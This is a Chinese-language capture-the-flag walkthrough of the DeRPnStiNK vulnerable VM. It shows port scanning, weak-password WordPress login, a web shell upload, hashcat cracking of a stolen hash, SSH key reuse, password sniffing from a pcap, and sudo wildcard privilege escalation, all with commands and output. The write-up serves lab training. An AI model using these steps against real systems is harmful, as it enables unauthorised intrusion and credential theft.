老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。
Nmap scan report for xxx.xxx.xxx.xxx
Host is up (1.2s latency).
Not shown: 996 closed ports
| PORT | STATE | SERVICE |
|---|---|---|
| 21/tcp | open | ftp |
| 22/tcp | open | ssh |
| 80/tcp | open | http |
| 514/tcp | filtered | shell |
0xflag1
打开网页,访问端口80。查看源码,找到第一个flag。
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
0xflag2
继续浏览网页源码,发现一个引用文件*/webnotes/info.txt*打开以后有一句话
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live,意思是要把映射域名。拿御剑扫一下。
| ID | 地址 | HTTP响应 |
|---|---|---|
| 1 | xxx.xxx.xxx.xxx/robots.txt | 200 |
| 2 | xxx.xxx.xxx.xxx /weblog/ | 301 |
| 3 | xxx.xxx.xxx.xxx/css | 301 |
| 4 | xxx.xxx.xxx.xxx/index.html | 200 |
| 5 | xxx.xxx.xxx.xxx/javascript | 301 |
| 6 | xxx.xxx.xxx.xxx/js | 301 |
| 7 | xxx.xxx.xxx.xxx/php | 301 |
| 8 | xxx.xxx.xxx.xxx/temporary/ | 200 |
有一个xxx.xxx.xxx.xxx/weblog/,点击打开发现无法打开,并且网址变成http://derpnstink.local/weblog/。
根据引用文件*/webnotes/info.txt*的提示,打开hosts文件最后一行加上xxx.xxx.xxx.xxx/derpnstink.local
再次打开http://derpnstink.local/weblog/,是一个wordpress博客的首页。管理员登陆网址是http://derpnstink.local/weblog/wp-login.php?loggedout=true,尝试弱口令登陆admin:admin,登陆成功。在管理员页面的发表文章上传一句话木马。用蚁剑连接,打开wp_config.php获取数据库用户名及密码root:mysql。
打开xxx.xxx.xxx.xxx/php/phpmyadmin/,登陆数据库,在表wp_posts中找到第二个flag:
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
0xflag3
在数据库的wp_users表里找到的两个用户,用hashcat来破解。已知其中admin:admin。另一个账号unclestinky的密码是一串哈希值$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41。用hashcat工具来破译。在终端输入命令
root@kali:~# hashcat -a 0 -m 400 hash.txt fasttrack.txt --force --show
破解得到unclestinky:wedgie57,用账号登陆ftp服务器,登陆失败。
猜测账号错误,尝试stinky,登陆成功,打开以后找到地址ftp://xxx.xxx.xxx.xxx/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt下载密钥。
将key.txt传入kali,终端输入ssh -i key.txt stinky@xxx.xxx.xxx.xxx,连接失败。
【错误提示】WORING:UNPROTECTED PRECVATE KEY FILE!
这里是说密钥文件权限不能为0777,0777权限太开放了,要求你的密钥文件不能被其它用户读取。
所以我们现在需要修改一下密钥文件权限。
在命令行输入chmod 700 key.txt即可。
再次连接,连接成功。
在桌面目录下找到第三个flag:
stinky@DeRPnStiNK:~Desktop/$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
###0xflag4
继续浏览其他目录,在documents文件夹下发现一个derpissues.pcap文件。
stinky@DeRPnStiNK:~Documents/$ ls
derpissues.pcap
在/ftp/files/network-logs路径下找到derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
大意再说mrderp的登不上账号,stinky帮他修改了密码。可能derpissues.pcap文件就是derpissues.txt之中内容的流量包,用wireshark打开分析,在一条post请求里找到mrderp的密码:derpderpderpderpderpderpderp。
切换终端用户,输入密码
stinky@DeRPnStiNK:/$ su mrderp
password:
mrderp@DeRPnStiNK:/$
切换成功。
在mrderp用户的文件夹中找到helpdesk.log。
内容中有一个网址https://pastebin.com/rzk9wfgw。
打开以后显示文本框:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*。
检查sudo -l
mrderp@DeRPnStiNK:~$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
提示mrderp只有在/binaries/路径下文件名有derpy的文件可以使用sudo命令。
在这个目录创建derpy.sh并在里面写下/bin/bash。
mrderp@DeRPnStiNK:~/binaries$ echo "/bin/bash" >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
/bin/bash
更改它的权限,并sudo执行,成功提权到root用户。
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh derpysu
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# ls
在/root/desktop路径下找到最后一个flag:
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
